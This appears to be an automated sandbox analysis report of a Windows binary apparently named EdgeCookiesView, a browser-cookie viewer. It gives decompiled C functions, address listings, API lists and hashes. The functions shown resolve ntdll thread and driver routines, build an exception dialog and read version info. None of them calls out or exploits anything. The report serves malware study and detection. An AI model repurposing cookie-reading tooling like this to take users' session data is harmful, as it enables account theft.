                                                                                                                                                0x004012c7
                                                                                                                                                0x004012d6
                                                                                                                                                0x004012d6
                                                                                                                                                0x004012f5
                                                                                                                                                0x0040130d
                                                                                                                                                0x0040131e
                                                                                                                                                0x00401320
                                                                                                                                                0x0040132a
                                                                                                                                                0x00000000
                                                                                                                                                0x004010df
                                                                                                                                                0x004010df
                                                                                                                                                0x004010e0
                                                                                                                                                0x00401265
                                                                                                                                                0x0040126a
                                                                                                                                                0x0040126d
                                                                                                                                                0x00401271
                                                                                                                                                0x0040127d
                                                                                                                                                0x0040127d
                                                                                                                                                0x00401280
                                                                                                                                                0x00000000
                                                                                                                                                0x00401286
                                                                                                                                                0x0040128d
                                                                                                                                                0x00401299
                                                                                                                                                0x00000000
                                                                                                                                                0x00401299
                                                                                                                                                0x00401273
                                                                                                                                                0x00401273
                                                                                                                                                0x00401277
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00401277
                                                                                                                                                0x004010e6
                                                                                                                                                0x004010e6
                                                                                                                                                0x004010e9
                                                                                                                                                0x00401215
                                                                                                                                                0x00401217
                                                                                                                                                0x0040121a
                                                                                                                                                0x00401242
                                                                                                                                                0x0040124a
                                                                                                                                                0x00000000
                                                                                                                                                0x00401250
                                                                                                                                                0x00401258
                                                                                                                                                0x0040125a
                                                                                                                                                0x0040125d
                                                                                                                                                0x00000000
                                                                                                                                                0x00401263
                                                                                                                                                0x00000000
                                                                                                                                                0x00401263
                                                                                                                                                0x0040125d
                                                                                                                                                0x0040121c
                                                                                                                                                0x0040121c
                                                                                                                                                0x00401221
                                                                                                                                                0x0040122f
                                                                                                                                                0x00401237
                                                                                                                                                0x00401237
                                                                                                                                                0x004010ef
                                                                                                                                                0x004010ef
                                                                                                                                                0x004010f4
                                                                                                                                                0x00401185
                                                                                                                                                0x0040118e
                                                                                                                                                0x0040119c
                                                                                                                                                0x0040119f
                                                                                                                                                0x004011a2
                                                                                                                                                0x004011a4
                                                                                                                                                0x004011a7
                                                                                                                                                0x004011b4
                                                                                                                                                0x004011b6
                                                                                                                                                0x004011b9
                                                                                                                                                0x004011d8
                                                                                                                                                0x004011e0
                                                                                                                                                0x00000000
                                                                                                                                                0x004011e6
                                                                                                                                                0x004011ee
                                                                                                                                                0x004011f0
                                                                                                                                                0x004011fb
                                                                                                                                                0x004011fd
                                                                                                                                                0x004011ff
                                                                                                                                                0x00000000
                                                                                                                                                0x00401205
                                                                                                                                                0x00000000
                                                                                                                                                0x00401205
                                                                                                                                                0x004011ff
                                                                                                                                                0x004011bb
                                                                                                                                                0x004011bb
                                                                                                                                                0x004011cd
                                                                                                                                                0x00000000
                                                                                                                                                0x004011cd
                                                                                                                                                0x004010fa
                                                                                                                                                0x004010fc
                                                                                                                                                0x00401331
                                                                                                                                                0x00401331
                                                                                                                                                0x00401331
                                                                                                                                                0x00401102
                                                                                                                                                0x00401102
                                                                                                                                                0x0040110b
                                                                                                                                                0x00401119
                                                                                                                                                0x0040111c
                                                                                                                                                0x0040111f
                                                                                                                                                0x00401121
                                                                                                                                                0x00401124
                                                                                                                                                0x00401136
                                                                                                                                                0x00401151
                                                                                                                                                0x00401159
                                                                                                                                                0x00000000
                                                                                                                                                0x0040115f
                                                                                                                                                0x00401167
                                                                                                                                                0x00401169
                                                                                                                                                0x00401174
                                                                                                                                                0x00401176
                                                                                                                                                0x00401178
                                                                                                                                                0x00000000
                                                                                                                                                0x0040117e
                                                                                                                                                0x0040117e
                                                                                                                                                0x00000000
                                                                                                                                                0x0040117e
                                                                                                                                                0x00401178
                                                                                                                                                0x00401138
                                                                                                                                                0x0040113e
                                                                                                                                                0x0040113f
                                                                                                                                                0x0040113f
                                                                                                                                                0x00401142
                                                                                                                                                0x00401149
                                                                                                                                                0x0040114b
                                                                                                                                                0x0040114b
                                                                                                                                                0x00401136
                                                                                                                                                0x004010fc
                                                                                                                                                0x004010f4
                                                                                                                                                0x004010e9
                                                                                                                                                0x004010e0
                                                                                                                                                0x00401337

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                • String ID: EdgeCookiesView
                                                                                                                                                • API String ID: 829165378-2656830938
                                                                                                                                                • Opcode ID: c334951574b09e503c6ba9ad871ca57f87af409fc7462e6d36551130802c1d45
                                                                                                                                                • Instruction ID: d9b36552e8d9c1158f8869abb926452dfc915059135fe28c0a7548d8f12e7aa6
                                                                                                                                                • Opcode Fuzzy Hash: c334951574b09e503c6ba9ad871ca57f87af409fc7462e6d36551130802c1d45
                                                                                                                                                • Instruction Fuzzy Hash: 87515A31500308EBEB31AF60DD44AAE7BB5FB44301F104A3AF951B69F0C778AD59AB08
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040C41D, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040C41D() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x4132c4 == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x4132c4 = _t2;
					 *0x413294 = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x413298 = GetProcAddress( *0x4132c4, "NtLoadDriver");
					 *0x41329c = GetProcAddress( *0x4132c4, "NtUnloadDriver");
					 *0x4132a0 = GetProcAddress( *0x4132c4, "NtOpenSymbolicLinkObject");
					 *0x4132a4 = GetProcAddress( *0x4132c4, "NtQuerySymbolicLinkObject");
					 *0x4132a8 = GetProcAddress( *0x4132c4, "NtQueryObject");
					 *0x4132ac = GetProcAddress( *0x4132c4, "NtOpenThread");
					 *0x4132b0 = GetProcAddress( *0x4132c4, "NtClose");
					 *0x4132b4 = GetProcAddress( *0x4132c4, "NtQueryInformationThread");
					 *0x4132b8 = GetProcAddress( *0x4132c4, "NtSuspendThread");
					 *0x4132bc = GetProcAddress( *0x4132c4, "NtResumeThread");
					_t14 = GetProcAddress( *0x4132c4, "NtTerminateThread");
					 *0x4132c0 = _t14;
					return _t14;
				}
				return _t1;
			}






                                                                                                                                                0x0040c424
                                                                                                                                                0x0040c430
                                                                                                                                                0x0040c442
                                                                                                                                                0x0040c454
                                                                                                                                                0x0040c466
                                                                                                                                                0x0040c478
                                                                                                                                                0x0040c48a
                                                                                                                                                0x0040c49c
                                                                                                                                                0x0040c4ae
                                                                                                                                                0x0040c4c0
                                                                                                                                                0x0040c4d2
                                                                                                                                                0x0040c4e4
                                                                                                                                                0x0040c4f6
                                                                                                                                                0x0040c508
                                                                                                                                                0x0040c50d
                                                                                                                                                0x0040c50f
                                                                                                                                                0x00000000
                                                                                                                                                0x0040c514
                                                                                                                                                0x0040c515

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,?,0040C596,?,?,00000000), ref: 0040C430
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 0040C447
                                                                                                                                                • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0040C459
                                                                                                                                                • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0040C46B
                                                                                                                                                • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0040C47D
                                                                                                                                                • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0040C48F
                                                                                                                                                • GetProcAddress.KERNEL32(NtQueryObject), ref: 0040C4A1
                                                                                                                                                • GetProcAddress.KERNEL32(NtOpenThread), ref: 0040C4B3
                                                                                                                                                • GetProcAddress.KERNEL32(NtClose), ref: 0040C4C5
                                                                                                                                                • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 0040C4D7
                                                                                                                                                • GetProcAddress.KERNEL32(NtSuspendThread), ref: 0040C4E9
                                                                                                                                                • GetProcAddress.KERNEL32(NtResumeThread), ref: 0040C4FB
                                                                                                                                                • GetProcAddress.KERNEL32(NtTerminateThread), ref: 0040C50D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                                • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                                                                                • API String ID: 667068680-4280973841
                                                                                                                                                • Opcode ID: 0eddc1e60b10c18c4745ef63ef14c7ef42ad6bc27fe304210325578cd75792ce
                                                                                                                                                • Instruction ID: 58691313bf47f16c5c12281129ebfbb01f3831da172bf8a538c636a3e5316245
                                                                                                                                                • Opcode Fuzzy Hash: 0eddc1e60b10c18c4745ef63ef14c7ef42ad6bc27fe304210325578cd75792ce
                                                                                                                                                • Instruction Fuzzy Hash: 27119778D41325AECB12BF71AD09ACA7EB1E764B5671084F7A408722F0D6B942A0DF4C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040C0C7, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 45%
                                                                                                                                                			E0040C0C7(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040E340(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00405B17(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x41245c,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00405D33( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x412450,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00405D33( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E0040591F();
					__eflags = _t64;
					if(_t64 == 0) {
						E0040C9D6();
					} else {
						E0040CA5A();
					}
					__eflags =  *0x41325c; // 0x0
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x412674; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x4128ec = 0;
						E0040CBD8(_t105, __eflags);
						__eflags =  *0x4128ec; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x4128f0, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x4128ec; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00405888( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x413260; // 0x0
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x412450);
							_push( *0x41245c);
							_push( *0x41244c);
							_push( *0x412434);
							_push( *0x412438);
							_push( *0x412440);
							_push( *0x412444);
							_push( *0x41243c);
							_push( *0x412448);
							_push( &_v1580);
							_push( *0x412674);
							_push( *0x412668);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040DFD6();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}































                                                                                                                                                0x0040c0cf
                                                                                                                                                0x0040c0d7
                                                                                                                                                0x0040c0df
                                                                                                                                                0x0040c162
                                                                                                                                                0x0040c176
                                                                                                                                                0x0040c17d
                                                                                                                                                0x0040c184
                                                                                                                                                0x0040c19d
                                                                                                                                                0x0040c19f
                                                                                                                                                0x0040c1b2
                                                                                                                                                0x0040c1b8
                                                                                                                                                0x0040c1c6
                                                                                                                                                0x0040c1cc
                                                                                                                                                0x0040c1df
                                                                                                                                                0x0040c1e6
                                                                                                                                                0x0040c1f7
                                                                                                                                                0x0040c1fe
                                                                                                                                                0x0040c203
                                                                                                                                                0x0040c206
                                                                                                                                                0x0040c218
                                                                                                                                                0x0040c225
                                                                                                                                                0x0040c229
                                                                                                                                                0x0040c22b
                                                                                                                                                0x0040c22d
                                                                                                                                                0x0040c23e
                                                                                                                                                0x0040c244
                                                                                                                                                0x0040c244
                                                                                                                                                0x0040c25b
                                                                                                                                                0x0040c25d
                                                                                                                                                0x0040c25f
                                                                                                                                                0x0040c26f
                                                                                                                                                0x0040c275
                                                                                                                                                0x0040c275
                                                                                                                                                0x0040c276
                                                                                                                                                0x0040c27b
                                                                                                                                                0x0040c27d
                                                                                                                                                0x0040c286
                                                                                                                                                0x0040c27f
                                                                                                                                                0x0040c27f
                                                                                                                                                0x0040c27f
                                                                                                                                                0x0040c28b
                                                                                                                                                0x0040c291
                                                                                                                                                0x0040c29b
                                                                                                                                                0x0040c2a8
                                                                                                                                                0x0040c2ae
                                                                                                                                                0x0040c2b3
                                                                                                                                                0x0040c2b9
                                                                                                                                                0x0040c2bc
                                                                                                                                                0x0040c2c2
                                                                                                                                                0x0040c2c3
                                                                                                                                                0x0040c2c4
                                                                                                                                                0x0040c2ca
                                                                                                                                                0x0040c2cf
                                                                                                                                                0x0040c2d7
                                                                                                                                                0x0040c2ea
                                                                                                                                                0x0040c2ef
                                                                                                                                                0x0040c2f2
                                                                                                                                                0x0040c2f8
                                                                                                                                                0x0040c30d
                                                                                                                                                0x0040c313
                                                                                                                                                0x0040c2f8
                                                                                                                                                0x00000000
                                                                                                                                                0x0040c293
                                                                                                                                                0x0040c293
                                                                                                                                                0x0040c299
                                                                                                                                                0x0040c314
                                                                                                                                                0x0040c31a
                                                                                                                                                0x0040c321
                                                                                                                                                0x0040c322
                                                                                                                                                0x0040c32e
                                                                                                                                                0x0040c334
                                                                                                                                                0x0040c33a
                                                                                                                                                0x0040c340
                                                                                                                                                0x0040c346
                                                                                                                                                0x0040c34c
                                                                                                                                                0x0040c352
                                                                                                                                                0x0040c358
                                                                                                                                                0x0040c35e
                                                                                                                                                0x0040c35f
                                                                                                                                                0x0040c36b
                                                                                                                                                0x0040c371
                                                                                                                                                0x0040c376
                                                                                                                                                0x0040c37b
                                                                                                                                                0x0040c37c
                                                                                                                                                0x0040c394
                                                                                                                                                0x0040c3a5
                                                                                                                                                0x0040c3ab
                                                                                                                                                0x0040c3b1
                                                                                                                                                0x0040c3b1
                                                                                                                                                0x00000000
                                                                                                                                                0x0040c299
                                                                                                                                                0x0040c291
                                                                                                                                                0x0040c0e2
                                                                                                                                                0x0040c0e8
                                                                                                                                                0x0040c0f3
                                                                                                                                                0x0040c116
                                                                                                                                                0x0040c124
                                                                                                                                                0x0040c13f
                                                                                                                                                0x0040c142
                                                                                                                                                0x0040c14e
                                                                                                                                                0x0040c156
                                                                                                                                                0x0040c156
                                                                                                                                                0x0040c116
                                                                                                                                                0x0040c0f3
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 0040C371
                                                                                                                                                • {Unknown}, xrefs: 0040C191
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                • API String ID: 4111938811-1819279800
                                                                                                                                                • Opcode ID: 888bafc67b277ea66c09e682880ee55d231aecf6e6b028a468f373f7cbb56ac5
                                                                                                                                                • Instruction ID: 3431b055b2365f4bc913e86f7a298cdc42a4156783f6a5b9feadd91d66c4c499
                                                                                                                                                • Opcode Fuzzy Hash: 888bafc67b277ea66c09e682880ee55d231aecf6e6b028a468f373f7cbb56ac5
                                                                                                                                                • Instruction Fuzzy Hash: B271A3B2800119EEDB20AF51DD85EDA377CEB08354F0085BAF908F6191DA799E949F68
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040DE36, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                			E0040DE36(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E0040674D(__edi);
					_push(_v8);
					L0040E038();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x6cdfe853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900006c
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0xfee850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0x38680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040fa
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040DFD6();
						if(E0040DDA7( &_v572, _t84,  &_v60, 0x40f454) == 0) {
							goto L5;
						}
					}
					E0040DDA7(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040DDA7(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040DDA7(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040DDA7(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040DDA7(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040DDA7(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040DDA7(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040DDA7(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040E032();
				}
				return _t97;
			}

















                                                                                                                                                0x0040de36
                                                                                                                                                0x0040de47
                                                                                                                                                0x0040de49
                                                                                                                                                0x0040de4c
                                                                                                                                                0x0040de53
                                                                                                                                                0x0040de56
                                                                                                                                                0x0040de5f
                                                                                                                                                0x0040de64
                                                                                                                                                0x0040de67
                                                                                                                                                0x0040de6d
                                                                                                                                                0x0040de77
                                                                                                                                                0x0040de91
                                                                                                                                                0x0040de93
                                                                                                                                                0x0040de96
                                                                                                                                                0x0040de99
                                                                                                                                                0x0040de9c
                                                                                                                                                0x0040de9f
                                                                                                                                                0x0040dea1
                                                                                                                                                0x0040dea4
                                                                                                                                                0x0040dea7
                                                                                                                                                0x0040deaa
                                                                                                                                                0x0040dead
                                                                                                                                                0x0040deb0
                                                                                                                                                0x0040deb3
                                                                                                                                                0x0040deb6
                                                                                                                                                0x0040deb6
                                                                                                                                                0x0040dece
                                                                                                                                                0x0040df08
                                                                                                                                                0x0040df11
                                                                                                                                                0x0040ded0
                                                                                                                                                0x0040ded0
                                                                                                                                                0x0040deda
                                                                                                                                                0x0040dedb
                                                                                                                                                0x0040dedc
                                                                                                                                                0x0040dee4
                                                                                                                                                0x0040dee6
                                                                                                                                                0x0040dee7
                                                                                                                                                0x0040df06
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040df06
                                                                                                                                                0x0040df25
                                                                                                                                                0x0040df3a
                                                                                                                                                0x0040df4f
                                                                                                                                                0x0040df64
                                                                                                                                                0x0040df79
                                                                                                                                                0x0040df8e
                                                                                                                                                0x0040dfa3
                                                                                                                                                0x0040dfb8
                                                                                                                                                0x0040dfbf
                                                                                                                                                0x0040dfc0
                                                                                                                                                0x0040dfc1
                                                                                                                                                0x0040dfc7
                                                                                                                                                0x0040dfcc

                                                                                                                                                APIs
                                                                                                                                                • GetFileVersionInfoSizeW.VERSION(0040730B,?,00000000), ref: 0040DE4C
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040DE67
                                                                                                                                                • GetFileVersionInfoW.VERSION(0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE77
                                                                                                                                                • VerQueryValueW.VERSION(00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE8A
                                                                                                                                                • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DEC7
                                                                                                                                                • _snwprintf.MSVCRT ref: 0040DEE7
                                                                                                                                                • wcscpy.MSVCRT ref: 0040DF11
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040DFC1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                                                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                • API String ID: 1223191525-1542517562
                                                                                                                                                • Opcode ID: 69e7b3d26914ff66313ef8682ccc4f82ae7b5cc4bcfe3f2ebefc357c3cedf984
                                                                                                                                                • Instruction ID: 259d72124e724de92b6e9870ccb5e43e5a0f9d392629a35824c20b6fa1ecb0e7
                                                                                                                                                • Opcode Fuzzy Hash: 69e7b3d26914ff66313ef8682ccc4f82ae7b5cc4bcfe3f2ebefc357c3cedf984
                                                                                                                                                • Instruction Fuzzy Hash: FB4135B2900219BEC704EBE5DC41DDEB7BCAF48304F504567B505B3181DB78AA99CBE8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004099C4, Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 63%
                                                                                                                                                			E004099C4(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2c0)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2c8)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2b4) = _t48;
						__imp__ImageList_SetImageCount(_t48, 1);
						_push( *(_t62 + 0x2b4));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2b4) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2ac), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2c4)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2b8) = _t46;
					__imp__ImageList_SetImageCount(_t46, 1);
					SendMessageW( *(_t62 + 0x2ac), 0x1003, 0,  *(_t62 + 0x2b8));
				}
				 *(_t62 + 0x2b0) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2b0), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2b0), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2b0), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E00402986( *(_t62 + 0x2ac)), 0x1208, 0,  *(_t62 + 0x2b0));
			}


















                                                                                                                                                0x004099cc
                                                                                                                                                0x004099d3
                                                                                                                                                0x004099e4
                                                                                                                                                0x004099f0
                                                                                                                                                0x00409a65
                                                                                                                                                0x00409a6a
                                                                                                                                                0x00409a70
                                                                                                                                                0x00409a76
                                                                                                                                                0x004099f2
                                                                                                                                                0x00409a00
                                                                                                                                                0x00409a07
                                                                                                                                                0x00409a17
                                                                                                                                                0x00409a1c
                                                                                                                                                0x00409a2e
                                                                                                                                                0x00409a4c
                                                                                                                                                0x00409a52
                                                                                                                                                0x00409a58
                                                                                                                                                0x00409a58
                                                                                                                                                0x00409a89
                                                                                                                                                0x00409a89
